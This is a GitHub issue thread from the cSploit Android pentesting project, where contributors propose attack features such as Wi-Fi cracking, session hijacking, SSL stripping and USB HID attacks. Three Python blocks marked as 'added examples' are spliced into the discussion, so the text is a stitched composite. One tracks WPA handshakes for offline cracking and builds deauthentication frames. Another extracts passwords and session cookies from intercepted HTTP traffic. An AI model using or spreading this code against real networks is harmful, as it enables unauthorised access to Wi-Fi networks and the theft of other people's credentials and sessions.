Closed ETeissonniere closed 7 years ago
Dayum if that could be in csploit:
- wifi cracking using USB card (workaround for any driver issue)
- on-device compiling of the newest cSploit code
- Router Keygen integration (the same range of supported routers)
- quick test for default credentials used in selected router's administration page
- automatic reporting of crashes and errors (combined with some simple on-server averaging)
... dayum
I can enable wifi cracking but it will need a patched android kernel. To compile you can use the AIDE app. I do not know what dayum is
By patching the android kernel you mean the mac80211 injection patch? Because Kali NetHunter has a guide https://github.com/offensive-security/kali-nethunter/wiki/Modifying-the-Kernel on doing just that, so that everyone can patch and configure their own kernels. Integration with Router Keygen seems kind of pointless, as modern devices have enough resources to switch between two apps. Some automation could be implemented, but will only cause issues in the long run. The default credentials and tabbed interface would be very useful. "Dayum" is the over-pronunciation of "Damn".
@DomenlDruga, yeah, I was speaking about that patch, then thanks for the translation :smile:
Metasploit Extra Console for testing MSF features that aren't currently included in the app. This could help to use exploits before they are even implemented, and would help in research to make cSploit's feature set bigger.
But this is just optional. The main thing I want to get with this is: more features.
Of course.
Hi,
- I'd like to have a complete suite for domain/subdomain analysis/discovery. Using dnsmap, dnsenum, fierce, whois, google (well, search.disconnect.me), etc... I think it would be easy to implement.
- dns spoofing using ettercap: I have it already implemented and working.
Anyway, I'm not sure if it happens only on my mobile (htc bravo 4.4.4), but there are a lot of problems with the latest apk/sources.
To name a few:
- login cracker not working (hydra segfault). This binary works fine: http://forum.xda-developers.com/showthread.php?t=2064605 but someone should compile the binary from the sources.
- passwordSniffer not intercepting SSL traffic (disabled by code: I've enabled it but the HTTPSredirector throws several SSLException when intercepting connections). Does anyone know why it is disabled? We could just use the ettercap plugin sslstrip, but it throws an error complaining about a cookie regex.
- network subnet does not always appear on the network list
- if, when stopping the sniffer, it exits with signal 11, cSploit displays an error and exits. I think it should not exit from cSploit, since the sniffer has already died and you can launch it again.
Has anyone seen these problems? I think I could fix some of them.
@ga, I think we could try something like an OSINT tool. Now some news: I found android pcap, an app which allows you to have a kismet-like tool with an external wifi card (without root). I will try to use the sources for the wifi cracking functionality.
Funny you should mention android-pcap https://kismetwireless.net/gitweb/?p=android-pcap.git;a=summary. I was just playing with it yesterday, got it building w/gradle + the new tools in Android Studio. FWIW, the play store listing https://play.google.com/store/apps/details?id=net.kismetwireless.android.pcapcapture says that it's GPL, but I didn't see a notice about what version in the actual source code.
Anyway, right now it only supports a few usb network adapters https://kismetwireless.net/gitweb/?p=android-pcap.git;a=blob;f=src/net/kismetwireless/android/pcapcapture/Rtl8187Card.java;h=b8e1a44bb3a32376876ae1ff169634d1355ad568;hb=HEAD specifically the rtl8187 card. More specifically:
- Alfa AWUS036H, LevelOne WNC-0301USB v5, LevelOne WNC-0305USB (0x0bda:0x8187)
- AirLive WL-1600USB (0x1b75:0x8187)
- NETGEAR WG111v2 (0x0846:0x6a00)
- NETGEAR WG111v3 (0x0846:0x4260)
Unfortunately I don't have one of these :/ But anyway, to build with android studio and the newest SDK, you just need to change a few things:
1. in src/net/kismetwireless/android/pcapcapture/PcapService.java https://kismetwireless.net/gitweb/?p=android-pcap.git;a=blob;f=src/net/kismetwireless/android/pcapcapture/PcapService.java;h=9416200b7a087c4422587e1e21489152ca8a6ce8;hb=HEAD use a NotificationCompat.Builder instead of the deprecated notification.setLatestEventInfo().
2. use this build.gradle https://gist.github.com/fat-tire/8f2546e623e019c7513d. I cleaned it up slightly (took out the signingConfigs section just because I didn't have a key to point to) from what I was using to build, but it should work w/o much effort.
3. remove libs/android-support-v4.jar
4. remove the versionCode/versionName and uses-sdk lines in AndroidManifest.xml
It would be nice to see support for other chipsets in there, but would have to create more UsbSource.java-type classes for each one, and they're not small. But I haven't looked into it for more than 3 minutes.
If anyone can get Kismet Wireless to post which version of the GPL this uses, that would be great. Their other tools https://play.google.com/store/apps/developer?id=Kismet+Wireless, particularly the cloudshark uploader, look interesting too.
ft
@Fattire thanks, will have a look. @tux-mind I will start working on all of that if you agree.
My idea is to have cSploit able to run also on a LAN interface. For example on my nethunter pad I have USB OTG cable connected to an USB LAN interface. Currently I can only use csploit with WLAN.
Is it possible to implement a WPA2-PSK hash sniffer? The script would forcefully disconnect clients and then monitor the traffic for the handshake (which can later be cracked using PC). Thoughts ?
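One way the capture half of this suggestion can be done, as an added example that is not part of this thread or of cSploit's code. It consumes the EAPOL payloads (the 802.1X frame behind the LLC/SNAP header of an 802.11 data frame) from a monitor-mode capture such as the android-pcap approach mentioned above, classifies each of the four handshake messages from the Key Information flags, and reports when enough has been seen for an offline PSK attack. The MAC addresses, nonces and the `make_key_frame` helper are constructed for illustration. The deauthentication frame is only built, never sent: injection needs monitor mode and the patched kernel discussed earlier.

```python
"""Detect a capturable WPA/WPA2 4-way handshake and build the deauth frame that provokes one.

Added example, not cSploit code. Frame layouts follow IEEE 802.1X / 802.11
(EAPOL-Key descriptor); sample frames below are constructed, not captured.
"""
import struct
from collections import defaultdict

EAPOL_KEY = 3                                   # 802.1X packet type for EAPOL-Key
KEY_DESC_RSN, KEY_DESC_WPA = 2, 254             # descriptor types: 802.11i RSN / legacy WPA
# Key Information flag bits
KI_PAIRWISE, KI_INSTALL, KI_ACK, KI_MIC, KI_SECURE = 1 << 3, 1 << 6, 1 << 7, 1 << 8, 1 << 9
ZERO_NONCE = bytes(32)


def classify(key_info, nonce):
    """Map Key Information flags to handshake message 1-4; None for group-key frames."""
    if not key_info & KI_PAIRWISE:
        return None
    ack, mic, secure, install = (bool(key_info & f) for f in (KI_ACK, KI_MIC, KI_SECURE, KI_INSTALL))
    if ack and not mic:
        return 1                                # AP -> STA, carries ANonce
    if ack and mic and install:
        return 3                                # AP -> STA, ANonce again plus encrypted GTK
    if not ack and mic:
        # M2 carries SNonce; M4 has Secure set (RSN) or an all-zero nonce (WPA)
        return 4 if secure or nonce == ZERO_NONCE else 2
    return None


def parse_eapol_key(data):
    """Parse an EAPOL-Key frame; return None for anything that is not one."""
    if len(data) < 99:                          # 4-byte 802.1X header + 95-byte fixed descriptor
        return None
    _version, ptype, body_len = struct.unpack("!BBH", data[:4])
    body = data[4:4 + body_len]
    if ptype != EAPOL_KEY or len(body) < 95 or body[0] not in (KEY_DESC_RSN, KEY_DESC_WPA):
        return None
    key_info, _key_len, replay = struct.unpack("!HHQ", body[1:13])
    nonce, mic = body[13:45], body[77:93]
    kd_len = struct.unpack("!H", body[93:95])[0]
    return {"key_info": key_info, "replay": replay, "nonce": nonce, "mic": mic,
            "key_data": body[95:95 + kd_len], "msg": classify(key_info, nonce)}


class HandshakeTracker:
    """Collect handshake messages per (AP, client) pair."""

    def __init__(self):
        self.sessions = defaultdict(dict)       # (ap_mac, sta_mac) -> {msg_no: parsed frame}

    def feed(self, src_mac, dst_mac, eapol):
        frame = parse_eapol_key(eapol)
        if frame is None or frame["msg"] is None:
            return None
        n = frame["msg"]
        ap, sta = (src_mac, dst_mac) if n in (1, 3) else (dst_mac, src_mac)
        self.sessions[(ap, sta)][n] = frame
        return n

    def crackable(self, ap_mac, sta_mac):
        """True once we hold M2 (SNonce + MIC) and an ANonce whose replay counter matches it.
        That is what an offline PSK attack needs; all four frames are not required."""
        s = self.sessions.get((ap_mac, sta_mac), {})
        m1, m2, m3 = s.get(1), s.get(2), s.get(3)
        if m2 is None:
            return False
        if m1 and m1["replay"] == m2["replay"]:
            return True
        return bool(m3 and m3["replay"] == m2["replay"] + 1)


def build_deauth(dst_mac, src_mac, bssid, reason=7, seq=0):
    """802.11 deauthentication frame (reason 7: class 3 frame from non-associated STA). Built only."""
    mac = lambda s: bytes.fromhex(s.replace(":", ""))
    return (b"\xc0\x00"                         # frame control: type management, subtype deauth
            + b"\x3a\x01"                       # duration field
            + mac(dst_mac) + mac(src_mac) + mac(bssid)
            + struct.pack("<H", seq << 4)       # sequence control, fragment 0
            + struct.pack("<H", reason))


def make_key_frame(key_info, replay, nonce=ZERO_NONCE, mic=bytes(16), key_data=b""):
    """Constructed EAPOL-Key frame for demonstration; in real use these come from the capture."""
    body = (bytes([KEY_DESC_RSN]) + struct.pack("!HHQ", key_info, 16, replay) + nonce
            + bytes(16) + bytes(8) + bytes(8) + mic + struct.pack("!H", len(key_data)) + key_data)
    return struct.pack("!BBH", 2, EAPOL_KEY, len(body)) + body


if __name__ == "__main__":
    ap, sta = "aa:bb:cc:dd:ee:ff", "11:22:33:44:55:66"   # constructed addresses
    t = HandshakeTracker()
    t.feed(ap, sta, make_key_frame(0x008a, 1, nonce=b"\xaa" * 32))                   # M1
    t.feed(sta, ap, make_key_frame(0x010a, 1, nonce=b"\xbb" * 32, mic=b"\xcc" * 16))  # M2
    print("crackable:", t.crackable(ap, sta), "deauth:", build_deauth(sta, ap, ap).hex())
```

The replay-counter check matters in practice: a stray M2 paired with an M1 from an earlier association produces a handshake that no cracker can verify, which is the usual reason a "captured" handshake never cracks.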
I might try... For the moment, I am trying to add external wifi card functionality, and optimize the app.
@sorano, would you mind adding a new issue with your suggestion? I've got a patch which allows you to select a configured network interface, in case no wireless interface is available. I've tested it with just the mobile gms interface, and it works fine.
Right now cSploit relies a lot on the wireless dhcp information to work properly, so for example, if you configure the mobile to work as a hotspot, the dhcp information is not available and we cannot use cSploit. From the command line ettercap works perfectly in this case.
@gainan Done. https://github.com/cSploit/android/issues/240
I love the idea of running cSploit on the GSM interface.
@gainan, good, maybe you can do a pull request....
There should really be a HID (human interface device) attack so you could connect your cellphone to a PC and it would be detected as a keyboard and start typing programmed commands, just like NetHunter (Kali Linux for Android) and the USB Rubber Ducky from Hak5. But I guess it would need to be able to do kernel changes for that... but anyway I think it would be possible to make some kind of automatic hack for when the cellphone is connected to a computer via USB (I remember there was an app that, if I'm not wrong, would automatically extract all saved passwords on a computer). Anyway, you understand my point, something that would work over USB :D .
How about quicker merging of pull requests? There are even some from February :D
Just to say that I am working on:
Thanks @DeveloppSoft. Really looking forward to it :-)
Another idea:
OK, I understand, it's a very low priority, but wouldn't it be cool to have a wearable support?
Yeah, maybe.
I've added a new wiki page with all the ideas we have contributed: https://github.com/cSploit/android/wiki/Ideas
If someone is working on any of these ideas, update the wiki with something like:
I'm not quite sure what "on-device compiling of the newest cSploit code" means -- that sounds like the app compiles itself (?)
@Tajnymag what would wearable support look like exactly? @DeveloppSoft I saw you stopped by IRC... come back! Wondering what you mean by "changing the cSploit architecture"
@fat-tire I thought something like that. cSPloit would download latest code, compile a new apk, then prompt to install it. Tadaa, problem with nightly server is solved :smile:
A wearable could display a list of devices on the LAN or available exploits. With RouterKeygen added, the wearable could inform you about a "crackable" network. As I said, it's a very low priority :-)
With nightly releases you have the option to test new features etc and might be less stable therefore I think nightly should be hosted on website and not downloaded directly in the app. Only stable releases should be (which it already does)
new idea: extend the session hijacker module functionality to:
- allow to detect users/pass fields on the URL.
- save not only the root domain of a cookie, but also all the pages the user is visiting within a URL.
- intercept not only web sites with cookies, but also without them
- allow to select which SSL cert to use.
@Fattire, I left IRC because I was using my Wiko OZZY which was closing the page each time I was opening a new one. By "changing the code architecture" I mean: have a cSploit android lib so the app is just the UI; it could be easier to use (one repo for the lib, another for the app). Finally, I think the time has come to launch cSploit 2.0 with a new UI and all the new functionalities, but maybe I am wrong. Will come soon to IRC.
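The first three session-hijacker extensions suggested by @gainan above (credential fields in the URL, recording every page visited per host, and recording requests that carry no cookie at all), shown as an added example in Python. It is not cSploit's session hijacker code and uses only the standard library; the request samples are constructed, the `USER_KEYS`/`PASS_KEYS` name lists are an assumed heuristic (a `csrf_token` field will match `token`, so treat hits as candidates to review), and in a real deployment the raw requests would come from the MitM proxy rather than from literals.

```python
"""Extract credential-looking fields and session cookies from captured HTTP requests.

Added example, not cSploit code. Handles credentials in the URL query, in an
x-www-form-urlencoded body, and requests with no Cookie header (still recorded,
grouped by host so the visited pages are kept).
"""
from http.cookies import SimpleCookie
from urllib.parse import parse_qsl, urlsplit

# Assumed heuristic: parameter names that usually carry a login or a secret.
USER_KEYS = ("user", "username", "login", "email", "uid", "account")
PASS_KEYS = ("pass", "password", "passwd", "pwd", "secret", "token")


def _classify(name):
    n = name.lower()
    if any(k in n for k in PASS_KEYS):
        return "password"
    if any(k in n for k in USER_KEYS):
        return "username"
    return None


def parse_request(raw):
    """Parse one raw HTTP/1.x request (bytes) into host, path, cookies and credential candidates."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    parts = urlsplit(target)
    params = parse_qsl(parts.query, keep_blank_values=True)       # credentials passed in the URL
    if method == "POST" and headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        params += parse_qsl(body.decode("latin-1"), keep_blank_values=True)   # login form bodies
    creds = {}
    for name, value in params:
        kind = _classify(name)
        if kind and kind not in creds:
            creds[kind] = value
    cookies = {}
    if "cookie" in headers:                                        # absent on many first requests
        jar = SimpleCookie()
        jar.load(headers["cookie"])
        cookies = {k: m.value for k, m in jar.items()}
    return {"host": headers.get("host", ""), "method": method, "path": parts.path,
            "cookies": cookies, "credentials": creds}


class SessionStore:
    """Per-host record of pages visited, cookies seen and credential candidates."""

    def __init__(self):
        self.by_host = {}

    def record(self, raw):
        r = parse_request(raw)
        s = self.by_host.setdefault(r["host"], {"pages": [], "cookies": {}, "credentials": {}})
        if r["path"] not in s["pages"]:
            s["pages"].append(r["path"])
        s["cookies"].update(r["cookies"])
        s["credentials"].update(r["credentials"])
        return s


# Constructed sample requests (not captured traffic).
SAMPLE_GET = b"GET /login?user=alice&pass=s3cret HTTP/1.1\r\nHost: intranet.example\r\n\r\n"
SAMPLE_POST = (b"POST /account/signin HTTP/1.1\r\nHost: intranet.example\r\n"
               b"Cookie: PHPSESSID=abc123; theme=dark\r\n"
               b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 29\r\n\r\n"
               b"username=bob&password=hunter2")
SAMPLE_NOCOOKIE = b"GET /docs/index.html HTTP/1.1\r\nHost: intranet.example\r\n\r\n"


def demo():
    store = SessionStore()
    for raw in (SAMPLE_GET, SAMPLE_POST, SAMPLE_NOCOOKIE):
        store.record(raw)
    return store.by_host["intranet.example"]


if __name__ == "__main__":
    print(demo())
```

Credentials in a GET query are the worst case for the victim: they also land in browser history, proxy logs and the Referer header of the next request, which is why flagging them separately from form posts is worthwhile.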
new idea:
Suggestion from @Avamander #69 Could you please add a ping tool to the list of tools?
Suggestion from @cycroja #212
Please let the app work without WLAN (this will be possible when #245 gets merged).
And maybe the MITM hotspot tethering option without internet.
Suggestion from @doringr #207
will csploit have the new sslstrip+ or sslstrip2 in a near future?
Suggestion from @uranium-waffles #185
On session stealing: as soon as you fix the msf issue sometime soon... I tried the stealer on my own amazon but it still asked for my password. You should add the user name and password right next to the session, kind of like zanti.
I'll drop this in here even if it not high prio.
Suggestion from @BoBeR182 #112 Will this project be looking to be distributed by f-droid?
Suggestion from @Avamander
Inform that a host is disconnected when launching modules (e.g. on "gray" hosts) or when running a module and the host disconnects mid-run.
Could you please improve the error messages? Just saying "An error occurred" does not help; also, it should auto-report the error and known errors should be numbered.
ok, let me answer to some of your great suggestions guys.
personally I love the unix philosophy: one program does one thing, and, hopefully, it does it well. so my first thought about RouterKeygen was to give a link to the store to download and use it.
BTW, i gave a look at the algorithms folder and I'm quite impressed of the number of WiFi AP that cSploit can reverse. that code has been written by evilsocket for dSploit.
what are your suggestions ? integrate missing algorithms that RouterKeygen support ?
as cSploit wants to be a multi-platform pentesting suite I will have to port all this stuff into the core. I'll have to write a C program that does it.
it would be useful only when tracing public IPs, and cSploit mainly works on internal networks. so i think that this feature is quite useless.
btw a possible implementation is to:
there are 2 main problems to make it work:
I suggest to open the router webpage asking the user to find the model if not yet known. then we will open routerpassword and/or portforward to let the user find it.
crash reports are already working.
up to you.
absolutely! sadly a ConsoleView is not so quick to make, just take a look at the TerminalEmulator project. we may expose a telnet bridge and use ConnectBot on localhost.
yep, once we switch to botbrew it will be quite easy to build these tools. search.disconnect.me sounds like a simple browser page to open :stuck_out_tongue_winking_eye:
requires botbrew
WiP.
solves #212
workflow:
requires botbrew to compile macchanger or ip2route
no sense.
I was joking, let me explain, @Tajnymag. your phone doesn't have the tools required to compile an apk, thus the nightly must be compiled somewhere else.
we can develop a remote control app for cSploit (thus to let you walk around while looking at your watch for routers with known key algorithms). I think that the notification is too boring. I find the default "notify when an open wifi is found" setting very boring, don't you agree?
Many functions of the MitM module must be moved into the core. a draft of the new proxy has been written here.
the most important feature IMHO is to use SSLsplit instead of SSLstrip; it can bypass HSTS and the end user will see a warning, not an SSL error.
solves #207
this is what I'm trying to do by moving all the big functions into the core.
but we cannot move everything into the core. please suggest some concrete example so we can discuss it.
do you mean running those tools against all known targets, right?
will be merged into complete suite for domain/subdomain analysis/discovery
yep.
requires botbrew
ok, low prio.
hem.. yes, someone will take care of this :smile:
port scanner/inspector on whole net yes, select the subnet and allow to scan it, like nmap -sS -P0 192.168.1.0/24
complete suite for domain/subdomain analysis/discovery: I mean to use some websites to extract more info, aka google dorks (site:xx inurl:xx ...) :)
Allow to select any network interface available on the system. Will you do it? Up to you, if you want I can adapt it to the latest changes, or feel free to start it from scratch ^^
new idea:
since the service inspector and login cracker depends on a previous port scan, when finish the port scan display 2 buttons: [service inspector] [login cracker]
Bluetooth hacking:
Is it possible to run msfconsole in cSploit to create exploits? Sorry for bad English.
Something like a port of Metasploit. Sorry for spam.
@gainan google dorks sound fine, but they are useful to find hidden resources on some webserver... I cannot understand how this stuff can be useful in an internal network. it's more related to an OSINT app than a pentesting one IMHO. but maybe I'm wrong, please show me how you suggest to use it :wink:
I'll test your pull request when I get home, there I have a TF201 with an USB port. as I said, that pull request must be merged :wink:
@DeveloppSoft I'm new to bluetooth hacking, however it sounds interesting. the social engineering feature is cool, especially combined with the bluetooth hack. I can imagine that you can record a conversation that you triggered with a fake SMS.
also the ability to infect any file with any payload is simply awesome.
@DeveloppSoft about botbrew, how does it launch dynamically linked executables on android? does it play with the LD_LIBRARY_PATH environment variable?
thanks for your time :blush:
Idea: cSploit working in hotspot mode.
@tux-mind, here is the manual
guys, we've started converting all these suggestions into new issues, in order to let @tux-mind categorize and prioritize them. So if you have any new suggestion, check first the already opened issues and comment/contribute on those, and if it's not created add a new issue.
@gainan please lock this issue once all those great ideas have been converted to issues.
thanks to all for your interest and help :blush:
@DeveloppSoft, would you mind adding your suggestions as several issues? I think you can explain them better than me :)
@Megaeloelo, that feature will be possible when this pull request will be implemented: #245. However it'll need additional work, because AFAIK the tethering option inserts several iptables rules, and when csploit starts a new hijacker session it cleans up the iptables rules. We should detect if the wifi is working in master mode.
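The two interface problems raised by @gainan above, picking a usable LAN interface when there is no Wi-Fi DHCP information (the #245 patch) and recognising that the Wi-Fi interface is running as a hotspot (master/AP mode) so its tethering iptables rules must not be flushed, as an added example in Python. This is not cSploit's code and not the #245 patch; it parses the Linux/Android kernel routing table text (`/proc/net/route`) and `iw dev` output, both embedded below as constructed samples. On a device, reading them may need root, and `iw` is assumed to be present (cSploit already ships its own native tools, so that is an assumption, not a given).

```python
"""Pick a LAN interface with its gateway and subnet from the kernel routing table,
and detect an interface running in AP (master) mode.

Added example, not cSploit code. Sample inputs are constructed.
"""
import ipaddress
import socket
import struct

RTF_UP, RTF_GATEWAY = 0x0001, 0x0002            # route flag bits as in <linux/route.h>

# Constructed /proc/net/route content: a Wi-Fi client on 192.168.1.0/24 and a
# USB Ethernet adapter on 10.0.0.0/16 with a worse metric.
SAMPLE_ROUTE = (
    "Iface\tDestination\tGateway \tFlags\tRefCnt\tUse\tMetric\tMask\t\tMTU\tWindow\tIRTT\n"
    "wlan0\t00000000\t0101A8C0\t0003\t0\t0\t0\t00000000\t0\t0\t0\n"
    "wlan0\t0001A8C0\t00000000\t0001\t0\t0\t0\t00FFFFFF\t0\t0\t0\n"
    "eth0\t00000000\t0100000A\t0003\t0\t0\t600\t00000000\t0\t0\t0\n"
    "eth0\t0000000A\t00000000\t0001\t0\t0\t600\t0000FFFF\t0\t0\t0\n"
)

# Constructed `iw dev` output: wlan0 is tethering (AP mode), wlan1 is a normal client.
SAMPLE_IW_DEV = (
    "phy#0\n\tInterface wlan0\n\t\tifindex 3\n\t\ttype AP\n\t\tchannel 6 (2437 MHz)\n"
    "phy#1\n\tInterface wlan1\n\t\tifindex 5\n\t\ttype managed\n"
)


def _hex_ip(h):
    """/proc/net/route stores addresses as little-endian hex of the network-order value."""
    return socket.inet_ntoa(struct.pack("<L", int(h, 16)))


def parse_routes(text):
    """Parse /proc/net/route text into a list of route dicts."""
    routes = []
    for line in text.splitlines()[1:]:          # first line is the column header
        f = line.split()
        if len(f) < 8:
            continue
        routes.append({"iface": f[0], "dest": _hex_ip(f[1]), "gateway": _hex_ip(f[2]),
                       "flags": int(f[3], 16), "metric": int(f[6]), "mask": _hex_ip(f[7])})
    return routes


def candidate_interfaces(routes, exclude=("lo",)):
    """Interfaces with a default route, as (iface, gateway, connected subnet), best metric first.

    The subnet is taken from the interface's directly connected route that contains the
    gateway, which is what a host discovery scan should be bounded to."""
    out = []
    for r in routes:
        if r["iface"] in exclude or r["dest"] != "0.0.0.0" or not r["flags"] & RTF_GATEWAY:
            continue
        connected = [ipaddress.ip_network(f"{c['dest']}/{c['mask']}", strict=False)
                     for c in routes
                     if c["iface"] == r["iface"] and not c["flags"] & RTF_GATEWAY
                     and c["dest"] != "0.0.0.0" and c["flags"] & RTF_UP]
        net = next((n for n in connected if ipaddress.ip_address(r["gateway"]) in n), None)
        out.append((r["metric"], r["iface"], r["gateway"], net))
    return [(iface, gw, net) for _, iface, gw, net in sorted(out, key=lambda x: x[0])]


def interface_modes(iw_dev_text):
    """Map interface name -> mode string ("AP", "managed", "monitor", ...) from `iw dev` output."""
    modes, current = {}, None
    for line in iw_dev_text.splitlines():
        tokens = line.strip().split()
        if len(tokens) == 2 and tokens[0] == "Interface":
            current = tokens[1]
        elif len(tokens) >= 2 and tokens[0] == "type" and current:
            modes[current] = tokens[1]
    return modes


def is_ap_mode(iw_dev_text, iface):
    """True when the interface is a hotspot (AP/master mode). A MitM module should then
    keep the tethering NAT rules instead of flushing iptables before adding its own."""
    return interface_modes(iw_dev_text).get(iface) == "AP"


if __name__ == "__main__":
    for iface, gw, net in candidate_interfaces(parse_routes(SAMPLE_ROUTE)):
        print(f"{iface}: gateway {gw}, scan range {net}, ap_mode={is_ap_mode(SAMPLE_IW_DEV, iface)}")
```

Deriving the target range from the connected route rather than from the Wi-Fi DHCP lease is what makes the USB Ethernet and mobile-data cases work at all, and it gives the same answer as the lease when one exists.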
Hey guys, @ga, of course, just give me some time. @tux-mind, I hope my link was useful; if you want, you can contact me on my personal email address (I think you can find it :smile:)
Hello guys, I opened this issue so you will be able to share some ideas concerning cSploit. Here is mine (working on it if @tux-mind thinks it can be good):